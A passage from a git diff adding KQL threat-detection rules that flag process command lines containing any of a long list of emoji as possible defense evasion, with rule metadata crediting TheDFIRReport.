"👳🏾" or ProcessCommandLine contains "👳🏾‍♂️" or ProcessCommandLine contains "🧕🏾" or ProcessCommandLine contains "👮🏾‍♀️" or ProcessCommandLine contains "👮🏾" or ProcessCommandLine contains "👮🏾‍♂️" or ProcessCommandLine contains "👷🏾‍♀️" or ProcessCommandLine contains "👷🏾" or ProcessCommandLine contains "👷🏾‍♂️" or ProcessCommandLine contains "💂🏾‍♀️" or ProcessCommandLine contains "💂🏾" or ProcessCommandLine contains 
"💂🏾‍♂️" or ProcessCommandLine contains "🕵🏾‍♀️" or ProcessCommandLine contains "🕵🏾" or ProcessCommandLine contains "🕵🏾‍♂️" or ProcessCommandLine contains "👩🏾‍⚕️" or ProcessCommandLine contains "🧑🏾‍⚕️" or ProcessCommandLine contains "👨🏾‍⚕️" or ProcessCommandLine contains "👩🏾‍🌾" or ProcessCommandLine contains "🧑🏾‍🌾" or ProcessCommandLine contains "👨🏾‍🌾" or ProcessCommandLine contains "👩🏾‍🍳" or ProcessCommandLine contains "🧑🏾‍🍳" or ProcessCommandLine contains "👨🏾‍🍳" or ProcessCommandLine contains "👩🏾‍🎓" or ProcessCommandLine contains "🧑🏾‍🎓" or ProcessCommandLine contains "👨🏾‍🎓" or ProcessCommandLine contains "👩🏾‍🎤" or ProcessCommandLine contains "🧑🏾‍🎤" or ProcessCommandLine contains "👨🏾‍🎤" or ProcessCommandLine contains "👩🏾‍🏫" or ProcessCommandLine contains "🧑🏾‍🏫" or ProcessCommandLine contains "👨🏾‍🏫" or ProcessCommandLine contains "👩🏾‍🏭" or ProcessCommandLine contains "🧑🏾‍🏭" or ProcessCommandLine contains "👨🏾‍🏭" or ProcessCommandLine contains "👩🏾‍💻" or ProcessCommandLine contains "🧑🏾‍💻" or ProcessCommandLine contains "👨🏾‍💻" or ProcessCommandLine contains "👩🏾‍💼" or ProcessCommandLine contains "🧑🏾‍💼" or ProcessCommandLine contains "👨🏾‍💼" or ProcessCommandLine contains "👩🏾‍🔧" or ProcessCommandLine contains "🧑🏾‍🔧" or ProcessCommandLine contains "👨🏾‍🔧" or ProcessCommandLine contains "👩🏾‍🔬" or ProcessCommandLine contains "🧑🏾‍🔬" or ProcessCommandLine contains "👨🏾‍🔬" or ProcessCommandLine contains "👩🏾‍🎨" or ProcessCommandLine contains "🧑🏾‍🎨" or ProcessCommandLine contains "👨🏾‍🎨" or ProcessCommandLine contains "👩🏾‍🚒" or ProcessCommandLine contains "🧑🏾‍🚒" or ProcessCommandLine contains "👨🏾‍🚒" or ProcessCommandLine contains "👩🏾‍✈️" or ProcessCommandLine contains "🧑🏾‍✈️" or ProcessCommandLine contains "👨🏾‍✈️" or ProcessCommandLine contains "👩🏾‍🚀" or ProcessCommandLine contains "🧑🏾‍🚀" or ProcessCommandLine contains "👨🏾‍🚀" or ProcessCommandLine contains "👩🏾‍⚖️" or ProcessCommandLine contains "🧑🏾‍⚖️" or ProcessCommandLine contains "👨🏾‍⚖️" or ProcessCommandLine contains "👰🏾‍♀️" or 
ProcessCommandLine contains "👰🏾" or ProcessCommandLine contains "👰🏾‍♂️" or ProcessCommandLine contains "🤵🏾‍♀️" or ProcessCommandLine contains "🤵🏾" or ProcessCommandLine contains "🤵🏾‍♂️" or ProcessCommandLine contains "👸🏾" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🤴🏾" or ProcessCommandLine contains "🥷🏾" or ProcessCommandLine contains "🦸🏾‍♀️" or ProcessCommandLine contains "🦸🏾" or ProcessCommandLine contains "🦸🏾‍♂️" or ProcessCommandLine contains "🦹🏾‍♀️" or ProcessCommandLine contains "🦹🏾" or ProcessCommandLine contains "🦹🏾‍♂️" or ProcessCommandLine contains "🤶🏾" or ProcessCommandLine contains "🧑🏾‍🎄" or ProcessCommandLine contains "🎅🏾" or ProcessCommandLine contains "🧙🏾‍♀️" or ProcessCommandLine contains "🧙🏾" or ProcessCommandLine contains "🧙🏾‍♂️" or ProcessCommandLine contains "🧝🏾‍♀️" or ProcessCommandLine contains "🧝🏾" or ProcessCommandLine contains "🧝🏾‍♂️" or ProcessCommandLine contains "🧛🏾‍♀️" or ProcessCommandLine contains "🧛🏾" or ProcessCommandLine contains "🧛🏾‍♂️" or ProcessCommandLine contains "🧜🏾‍♀️" or ProcessCommandLine contains "🧜🏾" or ProcessCommandLine contains "🧜🏾‍♂️" or ProcessCommandLine contains "🧚🏾‍♀️" or ProcessCommandLine contains "🧚🏾" or ProcessCommandLine contains "🧚🏾‍♂️" or ProcessCommandLine contains "👼🏾" or ProcessCommandLine contains "🤰🏾" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🤱🏾" or ProcessCommandLine contains "👩🏾‍🍼" or ProcessCommandLine contains "🧑🏾‍🍼" or ProcessCommandLine contains "👨🏾‍🍼" or ProcessCommandLine contains "🙇🏾‍♀️" or ProcessCommandLine contains "🙇🏾" or ProcessCommandLine contains "🙇🏾‍♂️" or ProcessCommandLine contains "💁🏾‍♀️" or ProcessCommandLine contains "💁🏾" or ProcessCommandLine contains "💁🏾‍♂️" or ProcessCommandLine contains "🙅🏾‍♀️" or ProcessCommandLine contains "🙅🏾" or ProcessCommandLine contains "🙅🏾‍♂️" or ProcessCommandLine contains "🙆🏾‍♀️" or ProcessCommandLine contains "🙆🏾" or ProcessCommandLine contains "🙆🏾‍♂️" or 
ProcessCommandLine contains "🙋🏾‍♀️" or ProcessCommandLine contains "🙋🏾" or ProcessCommandLine contains "🙋🏾‍♂️" or ProcessCommandLine contains "🧏🏾‍♀️" or ProcessCommandLine contains "🧏🏾" or ProcessCommandLine contains "🧏🏾‍♂️" or ProcessCommandLine contains "🤦🏾‍♀️" or ProcessCommandLine contains "🤦🏾" or ProcessCommandLine contains "🤦🏾‍♂️" or ProcessCommandLine contains "🤷🏾‍♀️" or ProcessCommandLine contains "🤷🏾" or ProcessCommandLine contains "🤷🏾‍♂️" or ProcessCommandLine contains "🙎🏾‍♀️" or ProcessCommandLine contains "🙎🏾" or ProcessCommandLine contains "🙎🏾‍♂️" or ProcessCommandLine contains "🙍🏾‍♀️" or ProcessCommandLine contains "🙍🏾" or ProcessCommandLine contains "🙍🏾‍♂️" or ProcessCommandLine contains "💇🏾‍♀️" or ProcessCommandLine contains "💇🏾" or ProcessCommandLine contains "💇🏾‍♂️" or ProcessCommandLine contains "💆🏾‍♀️" or ProcessCommandLine contains "💆🏾" or ProcessCommandLine contains "💆🏾‍♂️" or ProcessCommandLine contains "🧖🏾‍♀️" or ProcessCommandLine contains "🧖🏾" or ProcessCommandLine contains "🧖🏾‍♂️" or ProcessCommandLine contains "💃🏾" or ProcessCommandLine contains "🕺🏾" or ProcessCommandLine contains "👩🏾‍🦽" or ProcessCommandLine contains "🧑🏾‍🦽" or ProcessCommandLine contains "👨🏾‍🦽" or ProcessCommandLine contains "👩🏾‍🦼" or ProcessCommandLine contains "🧑🏾‍🦼" or ProcessCommandLine contains "👨🏾‍🦼" or ProcessCommandLine contains "🚶🏾‍♀️" or ProcessCommandLine contains "🚶🏾" or ProcessCommandLine contains "🚶🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦯" or ProcessCommandLine contains "🧑🏾‍🦯" or ProcessCommandLine contains "👨🏾‍🦯" or ProcessCommandLine contains "🧎🏾‍♀️" or ProcessCommandLine contains "🧎🏾" or ProcessCommandLine contains "🧎🏾‍♂️" or ProcessCommandLine contains "🏃🏾‍♀️" or ProcessCommandLine contains "🏃🏾" or ProcessCommandLine contains "🏃🏾‍♂️" or ProcessCommandLine contains "🧍🏾‍♀️" or ProcessCommandLine contains "🧍🏾" or ProcessCommandLine contains "🧍🏾‍♂️" or ProcessCommandLine contains "👭🏾" or ProcessCommandLine contains "🧑🏾‍🤝‍🧑🏾" or ProcessCommandLine 
contains "👬🏾" or ProcessCommandLine contains "👫🏾" or ProcessCommandLine contains "🧗🏾‍♀️" or ProcessCommandLine contains "🧗🏾" or ProcessCommandLine contains "🧗🏾‍♂️" or ProcessCommandLine contains "🏇🏾" or ProcessCommandLine contains "🏂🏾" or ProcessCommandLine contains "🏌🏾‍♀️" or ProcessCommandLine contains "🏌🏾" or ProcessCommandLine contains "🏌🏾‍♂️" or ProcessCommandLine contains "🏄🏾‍♀️" or ProcessCommandLine contains "🏄🏾" or ProcessCommandLine contains "🏄🏾‍♂️" or ProcessCommandLine contains "🚣🏾‍♀️" or ProcessCommandLine contains "🚣🏾" or ProcessCommandLine contains "🚣🏾‍♂️" or ProcessCommandLine contains "🏊🏾‍♀️" or ProcessCommandLine contains "🏊🏾" or ProcessCommandLine contains "🏊🏾‍♂️" or ProcessCommandLine contains "⛹🏾‍♀️" or ProcessCommandLine contains "⛹🏾" or ProcessCommandLine contains "⛹🏾‍♂️" or ProcessCommandLine contains "🏋🏾‍♀️" or ProcessCommandLine contains "🏋🏾" or ProcessCommandLine contains "🏋🏾‍♂️" or ProcessCommandLine contains "🚴🏾‍♀️" or ProcessCommandLine contains "🚴🏾" or ProcessCommandLine contains "🚴🏾‍♂️" or ProcessCommandLine contains "🚵🏾‍♀️" or ProcessCommandLine contains "🚵🏾" or ProcessCommandLine contains "🚵🏾‍♂️" or ProcessCommandLine contains "🤸🏾‍♀️" or ProcessCommandLine contains "🤸🏾" or ProcessCommandLine contains "🤸🏾‍♂️" or ProcessCommandLine contains "🤽🏾‍♀️" or ProcessCommandLine contains "🤽🏾" or ProcessCommandLine contains "🤽🏾‍♂️" or ProcessCommandLine contains "🤾🏾‍♀️" or ProcessCommandLine contains "🤾🏾" or ProcessCommandLine contains "🤾🏾‍♂️" or ProcessCommandLine contains "🤹🏾‍♀️" or ProcessCommandLine contains "🤹🏾" or ProcessCommandLine contains "🤹🏾‍♂️" or ProcessCommandLine contains "🧘🏾‍♀️" or ProcessCommandLine contains "🧘🏾" or ProcessCommandLine contains "🧘🏾‍♂️" or ProcessCommandLine contains "🛀🏾" or ProcessCommandLine contains "🛌🏾" or ProcessCommandLine contains "👋🏿" or ProcessCommandLine contains "🤚🏿" or ProcessCommandLine contains "🖐🏿" or ProcessCommandLine contains "✋🏿" or ProcessCommandLine contains "🖖🏿" or ProcessCommandLine 
contains "👌🏿" or ProcessCommandLine contains "🤌🏿" or ProcessCommandLine contains "🤏🏿" or ProcessCommandLine contains "✌🏿" or ProcessCommandLine contains "🤞🏿" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🤟🏿" or ProcessCommandLine contains "🤘🏿" or ProcessCommandLine contains "🤙🏿" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "👈🏿" or ProcessCommandLine contains "👉🏿" or ProcessCommandLine contains "👆🏿" or ProcessCommandLine contains "🖕🏿" or ProcessCommandLine contains "👇🏿" or ProcessCommandLine contains "☝🏿" or ProcessCommandLine contains "👍🏿" or ProcessCommandLine contains "👎🏿" or ProcessCommandLine contains "✊🏿" or ProcessCommandLine contains "👊🏿" or ProcessCommandLine contains "🤛🏿" or ProcessCommandLine contains "🤜🏿" or ProcessCommandLine contains "👏🏿" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🙌🏿" or ProcessCommandLine contains "👐🏿" or ProcessCommandLine contains "🤲🏿" or ProcessCommandLine contains "🙏🏿" or ProcessCommandLine contains "✍🏿" or ProcessCommandLine contains "🤳🏿" or ProcessCommandLine contains "💪🏿" or ProcessCommandLine contains "🦵🏿" or ProcessCommandLine contains "🦶🏿" or ProcessCommandLine contains "👂🏿" or ProcessCommandLine contains "🦻🏿" or ProcessCommandLine contains "👃🏿" or ProcessCommandLine contains "👶🏿" or ProcessCommandLine contains "👧🏿" or ProcessCommandLine contains "🧒🏿" or ProcessCommandLine contains "👦🏿" or ProcessCommandLine contains "👩🏿" or ProcessCommandLine contains "🧑🏿" or ProcessCommandLine contains "👨🏿" or ProcessCommandLine contains "👩🏿‍🦱" or ProcessCommandLine contains "🧑🏿‍🦱" or ProcessCommandLine contains "👨🏿‍🦱" or ProcessCommandLine contains "👩🏿‍🦰" or ProcessCommandLine contains "🧑🏿‍🦰" or ProcessCommandLine contains "👨🏿‍🦰" or ProcessCommandLine contains "👱🏿‍♀️" or ProcessCommandLine contains "👱🏿" or ProcessCommandLine 
contains "👱🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦳" or ProcessCommandLine contains "🧑🏿‍🦳" or ProcessCommandLine contains "👨🏿‍🦳" or ProcessCommandLine contains "👩🏿‍🦲" or ProcessCommandLine contains "🧑🏿‍🦲" or ProcessCommandLine contains "👨🏿‍🦲" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔🏿" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "👵🏿" or ProcessCommandLine contains "🧓🏿" or ProcessCommandLine contains "👴🏿" or ProcessCommandLine contains "👲🏿" or ProcessCommandLine contains "👳🏿‍♀️" or ProcessCommandLine contains "👳🏿" or ProcessCommandLine contains "👳🏿‍♂️" or ProcessCommandLine contains "🧕🏿" or ProcessCommandLine contains "👮🏿‍♀️" or ProcessCommandLine contains "👮🏿" or ProcessCommandLine contains "👮🏿‍♂️" or ProcessCommandLine contains "👷🏿‍♀️" or ProcessCommandLine contains "👷🏿" or ProcessCommandLine contains "👷🏿‍♂️" or ProcessCommandLine contains "💂🏿‍♀️" or ProcessCommandLine contains "💂🏿" or ProcessCommandLine contains "💂🏿‍♂️" or ProcessCommandLine contains "🕵🏿‍♀️" or ProcessCommandLine contains "🕵🏿" or ProcessCommandLine contains "🕵🏿‍♂️" or ProcessCommandLine contains "👩🏿‍⚕️" or ProcessCommandLine contains "🧑🏿‍⚕️" or ProcessCommandLine contains "👨🏿‍⚕️" or ProcessCommandLine contains "👩🏿‍🌾" or ProcessCommandLine contains "🧑🏿‍🌾" or ProcessCommandLine contains "👨🏿‍🌾" or ProcessCommandLine contains "👩🏿‍🍳" or ProcessCommandLine contains "🧑🏿‍🍳" or ProcessCommandLine contains "👨🏿‍🍳" or ProcessCommandLine contains "👩🏿‍🎓" or ProcessCommandLine contains "🧑🏿‍🎓" or ProcessCommandLine contains "👨🏿‍🎓" or ProcessCommandLine contains "👩🏿‍🎤" or ProcessCommandLine contains "🧑🏿‍🎤" or ProcessCommandLine contains "👨🏿‍🎤" or ProcessCommandLine contains "👩🏿‍🏫" or ProcessCommandLine contains "🧑🏿‍🏫" or ProcessCommandLine contains "👨🏿‍🏫" or ProcessCommandLine contains "👩🏿‍🏭" or ProcessCommandLine contains "🧑🏿‍🏭" or ProcessCommandLine contains "👨🏿‍🏭" or ProcessCommandLine contains "👩🏿‍💻" or ProcessCommandLine contains "🧑🏿‍💻" or 
ProcessCommandLine contains "👨🏿‍💻" or ProcessCommandLine contains "👩🏿‍💼" or ProcessCommandLine contains "🧑🏿‍💼" or ProcessCommandLine contains "👨🏿‍💼" or ProcessCommandLine contains "👩🏿‍🔧" or ProcessCommandLine contains "🧑🏿‍🔧" or ProcessCommandLine contains "👨🏿‍🔧" or ProcessCommandLine contains "👩🏿‍🔬" or ProcessCommandLine contains "🧑🏿‍🔬" or ProcessCommandLine contains "👨🏿‍🔬" or ProcessCommandLine contains "👩🏿‍🎨" or ProcessCommandLine contains "🧑🏿‍🎨" or ProcessCommandLine contains "👨🏿‍🎨" or ProcessCommandLine contains "👩🏿‍🚒" or ProcessCommandLine contains "🧑🏿‍🚒" or ProcessCommandLine contains "👨🏿‍🚒" or ProcessCommandLine contains "👩🏿‍✈️" or ProcessCommandLine contains "🧑🏿‍✈️" or ProcessCommandLine contains "👨🏿‍✈️" or ProcessCommandLine contains "👩🏿‍🚀" or ProcessCommandLine contains "🧑🏿‍🚀" or ProcessCommandLine contains "👨🏿‍🚀" or ProcessCommandLine contains "👩🏿‍⚖️" or ProcessCommandLine contains "🧑🏿‍⚖️" or ProcessCommandLine contains "👨🏿‍⚖️" or ProcessCommandLine contains "👰🏿‍♀️" or ProcessCommandLine contains "👰🏿" or ProcessCommandLine contains "👰🏿‍♂️" or ProcessCommandLine contains "🤵🏿‍♀️" or ProcessCommandLine contains "🤵🏿" or ProcessCommandLine contains "🤵🏿‍♂️" or ProcessCommandLine contains "👸🏿" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🤴🏿" or ProcessCommandLine contains "🥷🏿" or ProcessCommandLine contains "🦸🏿‍♀️" or ProcessCommandLine contains "🦸🏿" or ProcessCommandLine contains "🦸🏿‍♂️" or ProcessCommandLine contains "🦹🏿‍♀️" or ProcessCommandLine contains "🦹🏿" or ProcessCommandLine contains "🦹🏿‍♂️" or ProcessCommandLine contains "🤶🏿" or ProcessCommandLine contains "🧑🏿‍🎄" or ProcessCommandLine contains "🎅🏿" or ProcessCommandLine contains "🧙🏿‍♀️" or ProcessCommandLine contains "🧙🏿" or ProcessCommandLine contains "🧙🏿‍♂️" or ProcessCommandLine contains "🧝🏿‍♀️" or ProcessCommandLine contains "🧝🏿" or ProcessCommandLine contains "🧝🏿‍♂️" or ProcessCommandLine contains "🧛🏿‍♀️" or ProcessCommandLine contains "🧛🏿" or ProcessCommandLine contains 
"🧛🏿‍♂️" or ProcessCommandLine contains "🧜🏿‍♀️" or ProcessCommandLine contains "🧜🏿" or ProcessCommandLine contains "🧜🏿‍♂️" or ProcessCommandLine contains "🧚🏿‍♀️" or ProcessCommandLine contains "🧚🏿" or ProcessCommandLine contains "🧚🏿‍♂️" or ProcessCommandLine contains "👼🏿" or ProcessCommandLine contains "🤰🏿" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🤱🏿" or ProcessCommandLine contains "👩🏿‍🍼" or ProcessCommandLine contains "🧑🏿‍🍼" or ProcessCommandLine contains "👨🏿‍🍼" or ProcessCommandLine contains "🙇🏿‍♀️" or ProcessCommandLine contains "🙇🏿" or ProcessCommandLine contains "🙇🏿‍♂️" or ProcessCommandLine contains "💁🏿‍♀️" or ProcessCommandLine contains "💁🏿" or ProcessCommandLine contains "💁🏿‍♂️" or ProcessCommandLine contains "🙅🏿‍♀️" or ProcessCommandLine contains "🙅🏿" or ProcessCommandLine contains "🙅🏿‍♂️" or ProcessCommandLine contains "🙆🏿‍♀️" or ProcessCommandLine contains "🙆🏿" or ProcessCommandLine contains "🙆🏿‍♂️" or ProcessCommandLine contains "🙋🏿‍♀️" or ProcessCommandLine contains "🙋🏿" or ProcessCommandLine contains "🙋🏿‍♂️" or ProcessCommandLine contains "🧏🏿‍♀️" or ProcessCommandLine contains "🧏🏿" or ProcessCommandLine contains "🧏🏿‍♂️" or ProcessCommandLine contains "🤦🏿‍♀️" or ProcessCommandLine contains "🤦🏿" or ProcessCommandLine contains "🤦🏿‍♂️" or ProcessCommandLine contains "🤷🏿‍♀️" or ProcessCommandLine contains "🤷🏿" or ProcessCommandLine contains "🤷🏿‍♂️" or ProcessCommandLine contains "🙎🏿‍♀️" or ProcessCommandLine contains "🙎🏿" or ProcessCommandLine contains "🙎🏿‍♂️" or ProcessCommandLine contains "🙍🏿‍♀️" or ProcessCommandLine contains "🙍🏿" or ProcessCommandLine contains "🙍🏿‍♂️" or ProcessCommandLine contains "💇🏿‍♀️" or ProcessCommandLine contains "💇🏿" or ProcessCommandLine contains "💇🏿‍♂️" or ProcessCommandLine contains "💆🏿‍♀️" or ProcessCommandLine contains "💆🏿" or ProcessCommandLine contains "💆🏿‍♂️" or ProcessCommandLine contains "🧖🏿‍♀️" or ProcessCommandLine contains "🧖🏿" or ProcessCommandLine 
contains "🧖🏿‍♂️" or ProcessCommandLine contains "💃🏿" or ProcessCommandLine contains "🕺🏿" or ProcessCommandLine contains "🕴🏿" or ProcessCommandLine contains "👩🏿‍🦽" or ProcessCommandLine contains "🧑🏿‍🦽" or ProcessCommandLine contains "👨🏿‍🦽" or ProcessCommandLine contains "👩🏿‍🦼" or ProcessCommandLine contains "🧑🏿‍🦼" or ProcessCommandLine contains "👨🏿‍🦼" or ProcessCommandLine contains "🚶🏿‍♀️" or ProcessCommandLine contains "🚶🏿" or ProcessCommandLine contains "🚶🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦯" or ProcessCommandLine contains "🧑🏿‍🦯" or ProcessCommandLine contains "👨🏿‍🦯" or ProcessCommandLine contains "🧎🏿‍♀️" or ProcessCommandLine contains "🧎🏿" or ProcessCommandLine contains "🧎🏿‍♂️" or ProcessCommandLine contains "🏃🏿‍♀️" or ProcessCommandLine contains "🏃🏿" or ProcessCommandLine contains "🏃🏿‍♂️" or ProcessCommandLine contains "🧍🏿‍♀️" or ProcessCommandLine contains "🧍🏿" or ProcessCommandLine contains "🧍🏿‍♂️" or ProcessCommandLine contains "👭🏿" or ProcessCommandLine contains "🧑🏿‍🤝‍🧑🏿" or ProcessCommandLine contains "👬🏿" or ProcessCommandLine contains "👫🏿" or ProcessCommandLine contains "🧗🏿‍♀️" or ProcessCommandLine contains "🧗🏿" or ProcessCommandLine contains "🧗🏿‍♂️" or ProcessCommandLine contains "🏇🏿" or ProcessCommandLine contains "🏂🏿" or ProcessCommandLine contains "🏌🏿‍♀️" or ProcessCommandLine contains "🏌🏿" or ProcessCommandLine contains "🏌🏿‍♂️" or ProcessCommandLine contains "🏄🏿‍♀️" or ProcessCommandLine contains "🏄🏿" or ProcessCommandLine contains "🏄🏿‍♂️" or ProcessCommandLine contains "🚣🏿‍♀️" or ProcessCommandLine contains "🚣🏿" or ProcessCommandLine contains "🚣🏿‍♂️" or ProcessCommandLine contains "🏊🏿‍♀️" or ProcessCommandLine contains "🏊🏿" or ProcessCommandLine contains "🏊🏿‍♂️" or ProcessCommandLine contains "⛹🏿‍♀️" or ProcessCommandLine contains "⛹🏿" or ProcessCommandLine contains "⛹🏿‍♂️" or ProcessCommandLine contains "🏋🏿‍♀️" or ProcessCommandLine contains "🏋🏿" or ProcessCommandLine contains "🏋🏿‍♂️" or ProcessCommandLine contains "🚴🏿‍♀️" or 
ProcessCommandLine contains "🚴🏿" or ProcessCommandLine contains "🚴🏿‍♂️" or ProcessCommandLine contains "🚵🏿‍♀️" or ProcessCommandLine contains "🚵🏿" or ProcessCommandLine contains "🚵🏿‍♂️" or ProcessCommandLine contains "🤸🏿‍♀️" or ProcessCommandLine contains "🤸🏿" or ProcessCommandLine contains "🤸🏿‍♂️" or ProcessCommandLine contains "🤽🏿‍♀️" or ProcessCommandLine contains "🤽🏿" or ProcessCommandLine contains "🤽🏿‍♂️" or ProcessCommandLine contains "🤾🏿‍♀️" or ProcessCommandLine contains "🤾🏿" or ProcessCommandLine contains "🤾🏿‍♂️" or ProcessCommandLine contains "🤹🏿‍♀️" or ProcessCommandLine contains "🤹🏿" or ProcessCommandLine contains "🤹🏿‍♂️" or ProcessCommandLine contains "🧘🏿‍♀️" or ProcessCommandLine contains "🧘🏿" or ProcessCommandLine contains "🧘🏿‍♂️" or ProcessCommandLine contains "🛀🏿" or ProcessCommandLine contains "🛌🏿" or ProcessCommandLine contains "🐶" or ProcessCommandLine contains "🐱" or ProcessCommandLine contains "🐭" or ProcessCommandLine contains "🐹" or ProcessCommandLine contains "🐰" or ProcessCommandLine contains "🦊" or ProcessCommandLine contains "🐻" or ProcessCommandLine contains "🐼" or ProcessCommandLine contains "🐻‍❄️" or ProcessCommandLine contains "🐨" or ProcessCommandLine contains "🐯" or ProcessCommandLine contains "🦁" or ProcessCommandLine contains "🐮" or ProcessCommandLine contains "🐷" or ProcessCommandLine contains "🐽" or ProcessCommandLine contains "🐸" or ProcessCommandLine contains "🐵" or ProcessCommandLine contains "🙈" or ProcessCommandLine contains "🙉" or ProcessCommandLine contains "🙊" or ProcessCommandLine contains "🐒" or ProcessCommandLine contains "🐔" or ProcessCommandLine contains "🐧" or ProcessCommandLine contains "🐦" or ProcessCommandLine contains "🐤" or ProcessCommandLine contains "🐣" or ProcessCommandLine contains "🐥" \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
new file mode 100644
index 00000000..139776a1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🦆" or ProcessCommandLine contains "🦅" or ProcessCommandLine contains "🦉" or ProcessCommandLine contains "🦇" or ProcessCommandLine contains "🐺" or ProcessCommandLine contains "🐗" or ProcessCommandLine contains "🐴" or ProcessCommandLine contains "🦄" or ProcessCommandLine contains "🐝" or ProcessCommandLine contains "🪱" or ProcessCommandLine contains "🐛" or ProcessCommandLine contains "🦋" or ProcessCommandLine contains "🐌" or ProcessCommandLine contains "🐞" or ProcessCommandLine contains "🐜" or ProcessCommandLine contains "🪰" or ProcessCommandLine contains "🪲" or ProcessCommandLine contains "🪳" or ProcessCommandLine contains "🦟" or ProcessCommandLine contains "🦗" or ProcessCommandLine contains "🕷" or ProcessCommandLine contains "🕸" or ProcessCommandLine contains "🦂" or ProcessCommandLine contains "🐢" or ProcessCommandLine contains "🐍" or ProcessCommandLine contains "🦎" or ProcessCommandLine contains "🦖" or ProcessCommandLine contains "🦕" or ProcessCommandLine contains "🐙" or ProcessCommandLine contains "🦑" or ProcessCommandLine contains "🦐" or ProcessCommandLine contains "🦞" or ProcessCommandLine contains "🦀" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🐡" or ProcessCommandLine contains "🐠" or ProcessCommandLine contains "🐟" or ProcessCommandLine contains "🐬" or ProcessCommandLine contains "🐳" or ProcessCommandLine contains "🐋" or ProcessCommandLine contains "🦈" or ProcessCommandLine contains "🐊" or ProcessCommandLine contains "🐅" or ProcessCommandLine contains "🐆" or ProcessCommandLine contains "🦓" or ProcessCommandLine 
contains "🦍" or ProcessCommandLine contains "🦧" or ProcessCommandLine contains "🦣" or ProcessCommandLine contains "🐘" or ProcessCommandLine contains "🦛" or ProcessCommandLine contains "🦏" or ProcessCommandLine contains "🐪" or ProcessCommandLine contains "🐫" or ProcessCommandLine contains "🦒" or ProcessCommandLine contains "🦘" or ProcessCommandLine contains "🦬" or ProcessCommandLine contains "🐃" or ProcessCommandLine contains "🐂" or ProcessCommandLine contains "🐄" or ProcessCommandLine contains "🐎" or ProcessCommandLine contains "🐖" or ProcessCommandLine contains "🐏" or ProcessCommandLine contains "🐑" or ProcessCommandLine contains "🦙" or ProcessCommandLine contains "🐐" or ProcessCommandLine contains "🦌" or ProcessCommandLine contains "🐕" or ProcessCommandLine contains "🐩" or ProcessCommandLine contains "🦮" or ProcessCommandLine contains "🐕‍🦺" or ProcessCommandLine contains "🐈" or ProcessCommandLine contains "🐈‍⬛" or ProcessCommandLine contains "🪶" or ProcessCommandLine contains "🐓" or ProcessCommandLine contains "🦃" or ProcessCommandLine contains "🦤" or ProcessCommandLine contains "🦚" or ProcessCommandLine contains "🦜" or ProcessCommandLine contains "🦢" or ProcessCommandLine contains "🦩" or ProcessCommandLine contains "🕊" or ProcessCommandLine contains "🐇" or ProcessCommandLine contains "🦝" or ProcessCommandLine contains "🦨" or ProcessCommandLine contains "🦡" or ProcessCommandLine contains "🦫" or ProcessCommandLine contains "🦦" or ProcessCommandLine contains "🦥" or ProcessCommandLine contains "🐁" or ProcessCommandLine contains "🐀" or ProcessCommandLine contains "🐿" or ProcessCommandLine contains "🦔" or ProcessCommandLine contains "🐾" or ProcessCommandLine contains "🐉" or ProcessCommandLine contains "🐲" or ProcessCommandLine contains "🌵" or ProcessCommandLine contains "🎄" or ProcessCommandLine contains "🌲" or ProcessCommandLine contains "🌳" or ProcessCommandLine contains "🌴" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine 
contains "🪵" or ProcessCommandLine contains "🌱" or ProcessCommandLine contains "🌿" or ProcessCommandLine contains "☘️" or ProcessCommandLine contains "🍀" or ProcessCommandLine contains "🎍" or ProcessCommandLine contains "🪴" or ProcessCommandLine contains "🎋" or ProcessCommandLine contains "🍃" or ProcessCommandLine contains "🍂" or ProcessCommandLine contains "🍁" or ProcessCommandLine contains "🍄" or ProcessCommandLine contains "🐚" or ProcessCommandLine contains "🪨" or ProcessCommandLine contains "🌾" or ProcessCommandLine contains "💐" or ProcessCommandLine contains "🌷" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🌹" or ProcessCommandLine contains "🥀" or ProcessCommandLine contains "🌺" or ProcessCommandLine contains "🌸" or ProcessCommandLine contains "🌼" or ProcessCommandLine contains "🌻" or ProcessCommandLine contains "🌞" or ProcessCommandLine contains "🌝" or ProcessCommandLine contains "🌛" or ProcessCommandLine contains "🌜" or ProcessCommandLine contains "🌚" or ProcessCommandLine contains "🌕" or ProcessCommandLine contains "🌖" or ProcessCommandLine contains "🌗" or ProcessCommandLine contains "🌘" or ProcessCommandLine contains "🌑" or ProcessCommandLine contains "🌒" or ProcessCommandLine contains "🌓" or ProcessCommandLine contains "🌔" or ProcessCommandLine contains "🌙" or ProcessCommandLine contains "🌎" or ProcessCommandLine contains "🌍" or ProcessCommandLine contains "🌏" or ProcessCommandLine contains "🪐" or ProcessCommandLine contains "💫" or ProcessCommandLine contains "⭐️" or ProcessCommandLine contains "🌟" or 